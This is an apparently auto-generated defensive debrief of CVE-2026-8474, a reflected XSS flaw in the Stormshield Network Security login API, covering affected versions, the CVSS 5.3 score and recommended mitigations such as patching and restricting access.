CVE-2026-8474 StormShield CVE debrief

Who should care

Organizations operating Stormshield Network Security appliances for firewall or network security functions, particularly those with externally reachable administrative interfaces. Security teams responsible for web application security and network appliance hardening should prioritize patching.

Technical summary

The vulnerability is a reflected cross-site scripting (CWE-79) issue in the login API of Stormshield Network Security appliances. It affects versions 4.3.0–4.3.41, 4.8.0–4.8.15, and 5.0.0–5.0.5. Successful exploitation requires network access to the login API and can result in script execution in the victim's browser context, leading to cookie theft, sensitive data exposure, or malicious redirection. The attack does not require authentication per the CVSS vector (PR:N).

Defensive priority

medium

Recommended defensive actions

• Apply patches or updates from Stormshield as provided in advisory 2026-003 when available
• Restrict administrative access to the SNS login API to trusted networks only
• Monitor for suspicious requests targeting the login API endpoint
• Implement Content Security Policy (CSP) headers where supported to mitigate XSS impact
• Review and clear browser sessions for administrative users of affected appliances

Evidence notes

The CVE description and NVD record identify Stormshield as the affected vendor and cite advisory 2026-003 as the primary reference. The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N yields a base score of 5.3. NVD vulnerability status is Deferred as of the modified timestamp.

Official resources